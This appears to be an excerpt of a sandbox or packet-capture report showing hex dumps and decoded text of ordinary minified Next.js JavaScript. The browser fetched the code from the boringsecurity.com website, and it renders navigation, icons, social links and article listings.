                                                                          2023-12-10 16:44:51 UTC423INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 66 77 64 3d 6d 69 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 36 30 30 31 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 30 20 47 4d 54 0d 0a 45 74 61 67 3a 20
                                                                          Data Ascii: HTTP/1.1 200 OKAccept-Ranges: bytesAge: 0Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; fwd=missContent-Length: 26001Content-Type: application/javascript; charset=UTF-8Date: Sun, 10 Dec 2023 16:44:50 GMTEtag:
                                                                          2023-12-10 16:44:51 UTC763INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 39 36 5d 2c 7b 32 39 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6c 29 7b 76 61 72 20 72 3d 6c 28 31 31 35 32 37 29 2c 6e 3d 6c 28 33 31 39 30 39 29 2c 61 3d 6c 28 34 30 31 39 36 29 2c 69 3d 6c 2e 6e 28 61 29 2c 73 3d 6c 28 36 35 32 38 32 29 2c 43 3d 6c 2e 6e 28 73 29 2c 6f 3d 6c 28 34 37 37 31 34 29 3b 6c 65 74 20 63 3d 28 29 3d 3e 7b 6c 65 74 7b 74 3a 65 7d 3d 28 30 2c 6f 2e 24 47 29 28 22 63 6f 6d 6d 6f 6e 22 29 3b 72 65 74 75 72 6e 28 30 2c 72 2e 6a 73 78 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 62 67 2d 6e 61 76 2d 67 72
                                                                          Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[196],{293:function(e,t,l){var r=l(11527),n=l(31909),a=l(40196),i=l.n(a),s=l(65282),C=l.n(s),o=l(47714);let c=()=>{let{t:e}=(0,o.$G)("common");return(0,r.jsx)("div",{className:"bg-nav-gr
                                                                          2023-12-10 16:44:51 UTC2372INData Raw: 28 43 28 29 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 66 6c 65 78 20 66 6c 65 78 2d 72 6f 77 22 2c 68 72 65 66 3a 61 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 72 2e 6a 73 78 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 66 6f 6e 74 2d 6e 6f 72 6d 61 6c 20 74 72 61 63 6b 69 6e 67 2d 77 69 64 65 72 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 72 2e 6a 73 78 29 28 22 73 70 61 6e 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 75 6e 64 65 72 6c 69 6e 65 20 74 65 78 74 2d 78 73 20 74 65 78 74 2d 77 68 69 74 65 20 74 65 78 74 2d 63 65 6e 74 65 72 22 2c 63 68 69 6c 64 72 65 6e 3a 65 28 69 29 7d 29 7d 29 2c 6c 21 3d 3d 6e 2e 79 2e 6c 65 6e 67 74 68 2d 31 26 26 28 30 2c 72 2e 6a 73 78 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 6d 6c 2d 33 20 74
                                                                          Data Ascii: (C(),{className:"flex flex-row",href:a,children:[(0,r.jsx)("div",{className:"font-normal tracking-wider",children:(0,r.jsx)("span",{className:"underline text-xs text-white text-center",children:e(i)})}),l!==n.y.length-1&&(0,r.jsx)("div",{className:"ml-3 t
                                                                          2023-12-10 16:44:51 UTC538INData Raw: 74 2d 62 6f 6c 64 20 74 65 78 74 2d 5b 32 30 70 78 5d 20 68 6f 76 65 72 3a 74 65 78 74 2d 77 68 69 74 65 22 2c 68 72 65 66 3a 22 2f 22 2c 6c 6f 63 61 6c 65 3a 74 2e 6c 6f 63 61 6c 65 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 72 2e 6a 73 78 29 28 6f 28 29 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 6d 61 78 2d 77 2d 6e 6f 6e 65 20 68 2d 5b 34 38 70 78 5d 20 77 2d 5b 34 38 70 78 5d 22 2c 73 72 63 3a 22 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2e 70 6e 67 22 2c 68 65 69 67 68 74 3a 22 36 34 22 2c 77 69 64 74 68 3a 22 36 34 22 2c 61 6c 74 3a 22 6c 6f 67 6f 22 7d 29 2c 28 30 2c 72 2e 6a 73 78 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 74 65 78 74 2d 77 68 69 74 65 20 68 69 64 64 65 6e 20 73 6d 3a 62 6c 6f 63 6b 20 6d 6c 2d 32 20 6c 67 3a 6d 6c 2d 34 20
                                                                          Data Ascii: t-bold text-[20px] hover:text-white",href:"/",locale:t.locale,children:[(0,r.jsx)(o(),{className:"max-w-none h-[48px] w-[48px]",src:"/images/logo.png",height:"64",width:"64",alt:"logo"}),(0,r.jsx)("div",{className:"text-white hidden sm:block ml-2 lg:ml-4
                                                                          2023-12-10 16:44:51 UTC4744INData Raw: 61 64 6f 77 20 74 65 78 74 2d 5b 31 36 70 78 5d 20 66 6f 6e 74 2d 62 6c 61 63 6b 20 6c 65 61 64 69 6e 67 2d 5b 32 30 70 78 5d 20 74 72 61 63 6b 69 6e 67 2d 77 69 64 65 72 20 75 6e 64 65 72 6c 69 6e 65 20 74 65 78 74 2d 77 68 69 74 65 20 68 6f 76 65 72 3a 74 65 78 74 2d 62 72 61 6e 64 2d 70 72 69 6d 61 72 79 20 68 6f 76 65 72 3a 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 61 63 74 69 76 65 3a 74 65 78 74 2d 61 63 74 69 76 65 22 2c 68 72 65 66 3a 74 2c 74 61 72 67 65 74 3a 22 5f 62 6c 61 6e 6b 22 2c 72 65 6c 3a 22 6e 6f 72 65 66 65 72 72 65 72 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 72 2e 6a 73 78 29 28 78 2c 7b 6c 61 62 65 6c 3a 6c 2c 63 6f 70 79 3a 6e 2c 63 68 69 6c 64 72 65 6e 3a 61 3f 28 30 2c 72 2e 6a 73 78 29 28 61 2c 7b 7d 29 3a 6e 75 6c 6c 7d 29 7d 2c
                                                                          Data Ascii: adow text-[16px] font-black leading-[20px] tracking-wider underline text-white hover:text-brand-primary hover:no-underline active:text-active",href:t,target:"_blank",rel:"noreferrer",children:(0,r.jsx)(x,{label:l,copy:n,children:a?(0,r.jsx)(a,{}):null})},
                                                                          2023-12-10 16:44:51 UTC5930INData Raw: 74 75 72 6e 28 30 2c 72 2e 6a 73 78 29 28 22 73 76 67 22 2c 7b 77 69 64 74 68 3a 22 32 34 22 2c 68 65 69 67 68 74 3a 22 32 34 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 34 20 32 34 22 2c 66 69 6c 6c 3a 22 6e 6f 6e 65 22 2c 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 72 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 52 75 6c 65 3a 22 65 76 65 6e 6f 64 64 22 2c 63 6c 69 70 52 75 6c 65 3a 22 65 76 65 6e 6f 64 64 22 2c 64 3a 22 4d 36 2e 32 31 39 36 37 20 36 2e 32 31 39 36 37 43 36 2e 35 31 32 35 36 20 35 2e 39 32 36 37 38 20 36 2e 39 38 37 34 34 20 35 2e 39 32 36 37 38 20 37 2e 32 38 30 33 33 20 36 2e 32 31 39 36 37 4c 31 32 20 31 30 2e 39 33 39 33 4c
                                                                          Data Ascii: turn(0,r.jsx)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg",children:(0,r.jsx)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M6.21967 6.21967C6.51256 5.92678 6.98744 5.92678 7.28033 6.21967L12 10.9393L
                                                                          2023-12-10 16:44:51 UTC2995INData Raw: 64 72 65 6e 3a 5b 21 65 26 26 28 30 2c 72 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 52 75 6c 65 3a 22 65 76 65 6e 6f 64 64 22 2c 63 6c 69 70 52 75 6c 65 3a 22 65 76 65 6e 6f 64 64 22 2c 64 3a 22 4d 31 31 2e 33 37 35 20 36 2e 39 33 35 34 43 31 31 2e 35 36 20 37 2e 30 35 39 30 32 20 31 31 2e 37 37 37 35 20 37 2e 31 32 35 20 31 32 20 37 2e 31 32 35 43 31 32 2e 32 39 38 34 20 37 2e 31 32 35 20 31 32 2e 35 38 34 35 20 37 2e 30 30 36 34 37 20 31 32 2e 37 39 35 35 20 36 2e 37 39 35 34 39 43 31 33 2e 30 30 36 35 20 36 2e 35 38 34 35 32 20 31 33 2e 31 32 35 20 36 2e 32 39 38 33 37 20 31 33 2e 31 32 35 20 36 43 31 33 2e 31 32 35 20 35 2e 37 37 37 35 20 31 33 2e 30 35 39 20 35 2e 35 35 39 39 39 20 31 32 2e 39 33 35 34 20 35 2e 33 37 34 39 38 43 31 32 2e
                                                                          Data Ascii: dren:[!e&&(0,r.jsx)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M11.375 6.9354C11.56 7.05902 11.7775 7.125 12 7.125C12.2984 7.125 12.5845 7.00647 12.7955 6.79549C13.0065 6.58452 13.125 6.29837 13.125 6C13.125 5.7775 13.059 5.55999 12.9354 5.37498C12.
                                                                          2023-12-10 16:44:51 UTC8302INData Raw: 37 2e 31 30 36 32 20 31 36 2e 38 30 32 34 20 31 37 2e 31 32 35 33 20 31 36 2e 38 31 37 36 43 31 37 2e 32 32 36 32 20 31 36 2e 39 30 30 38 20 31 37 2e 33 33 31 39 20 31 36 2e 39 38 34 20 31 37 2e 34 33 38 34 20 31 37 2e 30 36 33 32 43 31 37 2e 34 37 34 39 20 31 37 2e 30 39 30 34 20 31 37 2e 34 37 32 35 20 31 37 2e 31 34 37 32 20 31 37 2e 34 33 32 38 20 31 37 2e 31 37 30 34 43 31 36 2e 39 33 30 36 20 31 37 2e 34 36 34 20 31 36 2e 34 30 38 35 20 31 37 2e 37 31 32 20 31 35 2e 38 35 39 34 20 31 37 2e 39 31 39 32 43 31 35 2e 38 32 33 37 20 31 37 2e 39 33 32 38 20 31 35 2e 38 30 37 38 20 31 37 2e 39 37 34 34 20 31 35 2e 38 32 35 33 20 31 38 2e 30 30 38 38 43 31 36 2e 31 32 38 20 31 38 2e 35 39 35 32 20 31 36 2e 34 37 33 37 20 31 39 2e 31 35 33 35 20 31 36 2e 38
                                                                          Data Ascii: 7.1062 16.8024 17.1253 16.8176C17.2262 16.9008 17.3319 16.984 17.4384 17.0632C17.4749 17.0904 17.4725 17.1472 17.4328 17.1704C16.9306 17.464 16.4085 17.712 15.8594 17.9192C15.8237 17.9328 15.8078 17.9744 15.8253 18.0088C16.128 18.5952 16.4737 19.1535 16.8
                                                                          2023-12-10 16:44:51 UTC357INData Raw: 69 70 74 69 6f 6e 3a 22 43 6f 6e 74 72 61 63 74 3a 20 30 78 30 31 2e 2e 2e 63 32 35 62 22 2c 69 6d 61 67 65 3a 22 2f 69 6d 61 67 65 73 2f 69 63 6f 6e 73 2f 45 74 68 65 72 73 63 61 6e 2e 73 76 67 22 2c 43 6f 6d 70 6f 6e 65 6e 74 3a 72 2e 45 79 7d 2c 7b 68 72 65 66 3a 22 68 74 74 70 73 3a 2f 2f 74 77 69 74 74 65 72 2e 63 6f 6d 2f 42 6f 72 69 6e 67 53 65 63 44 41 4f 22 2c 6c 61 62 65 6c 3a 22 54 77 69 74 74 65 72 22 2c 64 65 73 63 72 69 70 74 69 6f 6e 3a 22 40 42 6f 72 69 6e 67 53 65 63 44 61 6f 22 2c 69 6d 61 67 65 3a 22 2f 69 6d 61 67 65 73 2f 69 63 6f 6e 73 2f 54 77 69 74 74 65 72 2e 73 76 67 22 2c 43 6f 6d 70 6f 6e 65 6e 74 3a 72 2e 5a 6d 7d 2c 7b 68 72 65 66 3a 22 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 67 67 2f 68 41 48 76 33 79 36 39 67 64 22
                                                                          Data Ascii: iption:"Contract: 0x01...c25b",image:"/images/icons/Etherscan.svg",Component:r.Ey},{href:"https://twitter.com/BoringSecDAO",label:"Twitter",description:"@BoringSecDao",image:"/images/icons/Twitter.svg",Component:r.Zm},{href:"https://discord.gg/hAHv3y69gd"


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          95192.168.2.54982875.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:50 UTC572OUTGET /_next/static/chunks/pages/index-91b2c5d3a0144c32.js HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:51 UTC423INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 66 77 64 3d 6d 69 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 38 30 36 31 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 30 20 47 4d 54 0d 0a 45 74 61 67 3a 20
                                                                          Data Ascii: HTTP/1.1 200 OKAccept-Ranges: bytesAge: 0Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; fwd=missContent-Length: 28061Content-Type: application/javascript; charset=UTF-8Date: Sun, 10 Dec 2023 16:44:50 GMTEtag:
                                                                          2023-12-10 16:44:51 UTC763INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 30 35 5d 2c 7b 33 35 37 37 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 28 77 69 6e 64 6f 77 2e 5f 5f 4e 45 58 54 5f 50 3d 77 69 6e 64 6f 77 2e 5f 5f 4e 45 58 54 5f 50 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 22 2f 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 28 38 35 35 39 32 29 7d 5d 29 7d 2c 33 34 33 35 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6c 3d 61 28 37 39 32 32 38 29 2c 6e 3d 61 28 31 31 35 32 37 29 2c 73 3d 61 28 34 30 31 39 36 29 2c 72 3d 61 2e 6e 28 73 29 2c 69 3d 61 28 35 30 39 35 39 29
                                                                          Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[405],{35774:function(e,t,a){(window.__NEXT_P=window.__NEXT_P||[]).push(["/",function(){return a(85592)}])},34357:function(e,t,a){"use strict";var l=a(79228),n=a(11527),s=a(40196),r=a.n(s),i=a(50959)
                                                                          2023-12-10 16:44:51 UTC2372INData Raw: 6c 3d 3d 3d 28 65 3d 6e 75 6c 6c 3d 3d 73 3f 76 6f 69 64 20 30 3a 73 2e 61 62 6f 75 74 2e 64 61 74 61 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 61 74 74 72 69 62 75 74 65 73 2e 64 65 73 63 72 69 70 74 69 6f 6e 7d 2c 5b 73 5d 29 2c 75 3d 28 30 2c 69 2e 75 73 65 4d 65 6d 6f 29 28 28 29 3d 3e 7b 76 61 72 20 65 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 3d 28 65 3d 6e 75 6c 6c 3d 3d 73 3f 76 6f 69 64 20 30 3a 73 2e 61 62 6f 75 74 2e 64 61 74 61 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 61 74 74 72 69 62 75 74 65 73 2e 74 69 74 6c 65 7d 2c 5b 73 5d 29 3b 72 65 74 75 72 6e 28 30 2c 6e 2e 6a 73 78 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 77 2d 66 75 6c 6c 22 2c 63 68 69 6c 64 72 65 6e 3a 28
                                                                          Data Ascii: l===(e=null==s?void 0:s.about.data)||void 0===e?void 0:e.attributes.description},[s]),u=(0,i.useMemo)(()=>{var e;return null===(e=null==s?void 0:s.about.data)||void 0===e?void 0:e.attributes.title},[s]);return(0,n.jsx)("div",{className:"w-full",children:(
                                                                          2023-12-10 16:44:51 UTC538INData Raw: 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 6c 2e 6a 73 78 73 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 2d 6d 6c 2d 31 30 20 2d 6d 74 2d 34 20 66 6c 65 78 20 66 6c 65 78 2d 72 6f 77 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 34 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 6c 2e 6a 73 78 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 68 2d 5b 37 35 70 78 5d 20 77 2d 5b 37 35 70 78 5d 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 6c 2e 6a 73 78 29 28 22 61 22 2c 7b 68 72 65 66 3a 22 68 74 74 70 73 3a 2f 2f 74 77 69 74 74 65 72 2e 63 6f 6d 2f 22 2b 73 2c 74 61 72 67 65 74 3a 22 5f 62 6c 61 6e 6b 22 2c 72 65 6c 3a 22 6e 6f 72 65 66 65 72 72 65 72 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 6c 2e 6a 73 78 29 28 22 69 6d 67 22 2c
                                                                          Data Ascii: children:[(0,l.jsxs)("div",{className:"-ml-10 -mt-4 flex flex-row items-center gap-4",children:[(0,l.jsx)("div",{className:"h-[75px] w-[75px]",children:(0,l.jsx)("a",{href:"https://twitter.com/"+s,target:"_blank",rel:"noreferrer",children:(0,l.jsx)("img",
                                                                          2023-12-10 16:44:51 UTC4744INData Raw: 36 30 22 2c 63 68 69 6c 64 72 65 6e 3a 74 7d 29 7d 29 5d 7d 29 2c 28 30 2c 6c 2e 6a 73 78 73 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 66 6c 65 78 20 68 2d 66 75 6c 6c 20 66 6c 65 78 2d 63 6f 6c 20 6a 75 73 74 69 66 79 2d 62 65 74 77 65 65 6e 20 67 61 70 2d 34 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 61 3f 28 30 2c 6c 2e 6a 73 78 29 28 22 70 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 77 2d 66 69 6c 6c 20 74 65 78 74 2d 62 6c 61 63 6b 22 2c 63 68 69 6c 64 72 65 6e 3a 61 7d 29 3a 28 30 2c 6c 2e 6a 73 78 29 28 6c 2e 46 72 61 67 6d 65 6e 74 2c 7b 7d 29 2c 28 30 2c 6c 2e 6a 73 78 73 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 66 6c 65 78 20 66 6c 65 78 2d 72 6f 77 20 67 61 70 2d 34 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 73 3f 28 30 2c
                                                                          Data Ascii: 60",children:t})})]}),(0,l.jsxs)("div",{className:"flex h-full flex-col justify-between gap-4",children:[a?(0,l.jsx)("p",{className:"w-fill text-black",children:a}):(0,l.jsx)(l.Fragment,{}),(0,l.jsxs)("div",{className:"flex flex-row gap-4",children:[s?(0,
                                                                          2023-12-10 16:44:51 UTC5930INData Raw: 41 48 53 2b 4e 58 41 4f 48 34 43 45 4d 41 4f 30 48 5a 41 42 6d 6a 7a 56 77 50 6a 2f 41 6c 41 41 44 74 41 32 67 45 5a 49 49 31 66 44 59 7a 6a 4a 77 41 42 37 41 42 74 42 32 53 41 4e 6e 38 31 4d 4d 36 66 41 41 53 77 41 36 51 64 6b 41 48 53 2b 4e 58 41 4f 48 34 43 45 4d 41 4f 30 48 5a 41 42 6d 6a 7a 56 77 50 6a 2f 41 6c 41 41 44 74 41 32 67 45 5a 49 49 31 66 44 59 7a 6a 4a 77 41 42 37 41 42 74 42 32 53 41 4e 6e 38 31 4d 4d 36 66 41 41 53 77 41 36 51 64 6b 41 48 53 2b 4e 58 41 4f 48 34 43 45 4d 41 4f 30 48 5a 41 42 6d 6a 7a 56 77 50 6a 2f 41 6c 41 41 44 74 41 32 67 45 5a 49 49 31 66 44 59 7a 6a 4a 77 41 42 37 41 42 74 42 32 53 41 4e 6e 38 31 4d 4d 36 66 41 41 53 77 41 36 51 64 6b 41 48 53 2b 4e 58 41 4f 48 34 43 45 4d 41 4f 30 48 5a 41 42 6d 6a 7a 56 77 50 6a
                                                                          Data Ascii: AHS+NXAOH4CEMAO0HZABmjzVwPj/AlAADtA2gEZII1fDYzjJwAB7ABtB2SANn81MM6fAASwA6QdkAHS+NXAOH4CEMAO0HZABmjzVwPj/AlAADtA2gEZII1fDYzjJwAB7ABtB2SANn81MM6fAASwA6QdkAHS+NXAOH4CEMAO0HZABmjzVwPj/AlAADtA2gEZII1fDYzjJwAB7ABtB2SANn81MM6fAASwA6QdkAHS+NXAOH4CEMAO0HZABmjzVwPj
                                                                          2023-12-10 16:44:51 UTC2996INData Raw: 3d 3d 6e 7d 29 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 6c 2e 6a 73 78 29 28 22 73 70 61 6e 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 77 28 29 28 7b 22 74 65 78 74 2d 73 6d 20 66 6f 6e 74 2d 6d 65 64 69 75 6d 22 3a 21 30 2c 22 74 65 78 74 2d 73 6d 20 66 6f 6e 74 2d 6d 65 64 69 75 6d 20 74 65 78 74 2d 62 6c 61 63 6b 22 3a 65 2e 69 64 3d 3d 3d 6e 7d 29 2c 63 68 69 6c 64 72 65 6e 3a 65 2e 61 74 74 72 69 62 75 74 65 73 2e 6e 61 6d 65 7d 29 7d 29 7d 2c 65 2e 69 64 29 29 7d 29 7d 29 5d 7d 29 7d 29 7d 3b 76 61 72 20 71 3d 61 28 36 35 32 38 32 29 2c 54 3d 61 2e 6e 28 71 29 3b 66 75 6e 63 74 69 6f 6e 20 59 28 29 7b 6c 65 74 20 65 3d 28 30 2c 72 2e 5a 29 28 5b 22 5c 6e 71 75 65 72 79 20 47 65 74 41 72 74 69 63 6c 65 73 28 5c 6e 20 20 20 20 24 70 61 67 65 3a 20 49 6e 74
                                                                          Data Ascii: ==n}),children:(0,l.jsx)("span",{className:w()({"text-sm font-medium":!0,"text-sm font-medium text-black":e.id===n}),children:e.attributes.name})})},e.id))})})]})})};var q=a(65282),T=a.n(q);function Y(){let e=(0,r.Z)(["\nquery GetArticles(\n $page: Int
                                                                          2023-12-10 16:44:51 UTC8302INData Raw: 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 2d 6d 74 2d 34 20 66 6c 65 78 20 66 6c 65 78 2d 72 6f 77 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 34 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 6c 2e 6a 73 78 29 28 22 73 70 61 6e 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 72 6f 75 6e 64 65 64 2d 32 78 6c 20 62 67 2d 77 68 69 74 65 20 70 79 2d 32 20 70 78 2d 34 20 61 6c 69 67 6e 2d 6d 69 64 64 6c 65 20 74 65 78 74 2d 73 6d 20 66 6f 6e 74 2d 6d 65 64 69 75 6d 20 74 65 78 74 2d 62 6c 61 63 6b 22 2c 63 68 69 6c 64 72 65 6e 3a 6e 75 6c 6c 3d 3d 3d 28 72 3d 64 2e 61 74 74 72 69 62 75 74 65 73 2e 63 61 74 65 67 6f 72 79 2e 64 61 74 61 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 72 3f 76 6f 69 64 20 30 3a 72 2e 61 74 74 72 69 62 75 74 65 73 2e 6e 61 6d 65 7d 29
                                                                          Data Ascii: iv",{className:"-mt-4 flex flex-row items-center gap-4",children:(0,l.jsx)("span",{className:"rounded-2xl bg-white py-2 px-4 align-middle text-sm font-medium text-black",children:null===(r=d.attributes.category.data)||void 0===r?void 0:r.attributes.name})
                                                                          2023-12-10 16:44:51 UTC698INData Raw: 61 67 65 3a 31 2c 70 61 67 65 53 69 7a 65 3a 31 32 2c 6c 6f 63 61 6c 65 3a 6e 75 6c 6c 21 3d 3d 28 65 3d 61 2e 6c 6f 63 61 6c 65 29 26 26 76 6f 69 64 20 30 21 3d 3d 65 3f 65 3a 22 65 6e 22 7d 7d 29 2c 73 3d 28 30 2c 63 2e 75 73 65 4d 65 6d 6f 29 28 28 29 3d 3e 6e 75 6c 6c 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 73 68 6f 70 73 2e 64 61 74 61 2e 66 69 6c 74 65 72 28 65 3d 3e 76 6f 69 64 20 30 21 3d 3d 57 28 65 2e 61 74 74 72 69 62 75 74 65 73 2e 69 6d 61 67 65 2e 64 61 74 61 2e 61 74 74 72 69 62 75 74 65 73 2e 66 6f 72 6d 61 74 73 29 29 2e 6d 61 70 28 65 3d 3e 28 7b 74 69 74 6c 65 3a 65 2e 61 74 74 72 69 62 75 74 65 73 2e 74 69 74 6c 65 2c 6c 69 6e 6b 3a 65 2e 61 74 74 72 69 62 75 74 65 73 2e 6c 69 6e 6b 2c 69 6d 61 67 65 3a 57 28 65 2e 61 74 74 72 69 62 75
                                                                          Data Ascii: age:1,pageSize:12,locale:null!==(e=a.locale)&&void 0!==e?e:"en"}}),s=(0,c.useMemo)(()=>null==n?void 0:n.shops.data.filter(e=>void 0!==W(e.attributes.image.data.attributes.formats)).map(e=>({title:e.attributes.title,link:e.attributes.link,image:W(e.attribu
